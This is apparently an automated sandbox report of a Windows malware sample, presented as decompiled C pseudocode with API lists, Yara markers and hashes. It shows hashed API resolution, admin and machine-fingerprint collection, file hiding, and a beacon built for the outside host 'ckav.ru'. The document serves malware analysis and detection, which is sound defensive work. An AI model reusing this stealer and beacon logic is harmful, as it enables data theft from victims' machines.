				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                      0x004042cf
                      0x004042d5
                      0x004042df
                      0x004042e2
                      0x004042f9
                      0x004042fb
                      0x00404300
                      0x0040430a
                      0x00404314
                      0x00404319
                      0x00404323
                      0x00404334
                      0x0040433b
                      0x0040433b
                      0x0040433f
                      0x00404344
                      0x0040434c

                      APIs
                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: File$CreatePointerWrite
                      • String ID:
                      • API String ID: 3672724799-0
                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                      Download Yara Rule
                      C-Code - Quality: 34%
                      			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                      0x00412d31
                      0x00412d34
                      0x00412d39
                      0x00412d3c
                      0x00412d49
                      0x00412d50
                      0x00412d52
                      0x00412f24
                      0x00412f24
                      0x00412f2b
                      0x00412f30
                      0x00412f32
                      0x00412f37
                      0x00412f41
                      0x00412f53
                      0x00412f53
                      0x00412f5b
                      0x00412f60
                      0x00412d58
                      0x00412d58
                      0x00412d63
                      0x00412d6c
                      0x00412d73
                      0x00412d7e
                      0x00412d7f
                      0x00412d80
                      0x00412d81
                      0x00412d82
                      0x00412d8f
                      0x00412da1
                      0x00412da6
                      0x00412dae
                      0x00412db0
                      0x00412db1
                      0x00412db5
                      0x00412dce
                      0x00412dcf
                      0x00412dd5
                      0x00412dda
                      0x00412db7
                      0x00412db7
                      0x00412db8
                      0x00412dbe
                      0x00412dc4
                      0x00412dc9
                      0x00412dc9
                      0x00412de2
                      0x00412de4
                      0x00412de5
                      0x00412de7
                      0x00412de9
                      0x00412e02
                      0x00412e03
                      0x00412e09
                      0x00412e0e
                      0x00412deb
                      0x00412deb
                      0x00412dec
                      0x00412df2
                      0x00412df8
                      0x00412dfd
                      0x00412dfd
                      0x00412e11
                      0x00412e17
                      0x00412e19
                      0x00412e1a
                      0x00412e1e
                      0x00412e37
                      0x00412e38
                      0x00412e3e
                      0x00412e43
                      0x00412e20
                      0x00412e20
                      0x00412e21
                      0x00412e27
                      0x00412e2d
                      0x00412e32
                      0x00412e32
                      0x00412e4b
                      0x00412e4d
                      0x00412e4f
                      0x00412e7e
                      0x00412e8a
                      0x00412e8f
                      0x00412e51
                      0x00412e59
                      0x00412e67
                      0x00412e6d
                      0x00412e72
                      0x00412e72
                      0x00412e9e
                      0x00412eaf
                      0x00412eb4
                      0x00412ec0
                      0x00412ece
                      0x00412edc
                      0x00412eea
                      0x00412ef8
                      0x00412f0f
                      0x00412f14
                      0x00412f14
                      0x00412f17
                      0x00412f1d
                      0x00412f1f
                      0x00000000
                      0x00412f1f
                      0x00412f74

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                        • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$CreateFreeProcessThread_wmemset
                      • String ID: ckav.ru
                      • API String ID: 2915393847-2696028687
                      • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                      • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                      0x00406340
                      0x00406345
                      0x00406373
                      0x00406373
                      0x00406347
                      0x0040634f
                      0x00406354
                      0x00406357
                      0x0040635c
                      0x00406366
                      0x0040636d
                      0x00000000
                      0x00406368
                      0x00406368
                      0x00406368
                      0x00406366
                      0x0040637a

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser_wmemset
                      • String ID: CA
                      • API String ID: 2078537776-1052703068
                      • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                      • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                      0x00406094
                      0x004060a8
                      0x004060ab

                      APIs
                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: InformationToken
                      • String ID: IDA
                      • API String ID: 4114910276-365204570
                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                      0x00402c10
                      0x00402c15
                      0x00402c1b
                      0x00402c1e

                      APIs
                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AddressProc
                      • String ID: s1@
                      • API String ID: 190572456-427247929
                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                      0x00404a56
                      0x00404a65
                      0x00404a6a
                      0x00404ad1
                      0x00404ad1
                      0x00404a6c
                      0x00404a71
                      0x00404a79
                      0x00404a85
                      0x00404a9a
                      0x00404a9e
                      0x00404acb
                      0x00000000
                      0x00404aa0
                      0x00404aac
                      0x00404abc
                      0x00404ac1
                      0x00404ac6
                      0x00404ac6
                      0x00404a9e
                      0x00404ad9

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateOpenProcessQueryValue
                      • String ID:
                      • API String ID: 1425999871-0
                      • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                      • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                      Download Yara Rule
                      C-Code - Quality: 40%
                      			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                      0x004060c6
                      0x004060d5
                      0x004060d8
                      0x004060f4
                      0x004060f6
                      0x004060fb
                      0x0040610a
                      0x00406115
                      0x0040611c
                      0x0040611e
                      0x00406121
                      0x00000000
                      0x0040612a
                      0x0040612f

                      APIs
                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CheckMembershipToken
                      • String ID:
                      • API String ID: 1351025785-0
                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                      0x00403c68
                      0x00403c70
                      0x00403c78
                      0x00403c82
                      0x00403c8b
                      0x00403c8f
                      0x00403c72
                      0x00403c76
                      0x00403c76

                      APIs
                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: CreateDirectory
                      • String ID:
                      • API String ID: 4241100979-0
                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                      0x0040643c
                      0x00406445
                      0x00406454

                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                      0x00404eed
                      0x00404ef2
                      0x00404efd
                      0x00404efd
                      0x00404f07
                      0x00404f0e

                      APIs
                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: send
                      • String ID:
                      • API String ID: 2809346765-0
                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                      0x00403bdd
                      0x00403beb
                      0x00403bee

                      APIs
                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FileMove
                      • String ID:
                      • API String ID: 3562171763-0
                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                      Download Yara Rule
                      APIs
                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Startup
                      • String ID:
                      • API String ID: 724789610-0
                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                      0x0040428a
                      0x00404297
                      0x0040429a

                      APIs
                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                      0x00404a27
                      0x00404a35
                      0x00404a38

                      APIs
                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                      0x00403c4d
                      0x00403c55
                      0x00403c58

                      APIs
                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ChangeCloseFindNotification
                      • String ID:
                      • API String ID: 2591292051-0
                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403C08(WCHAR* _a4) {
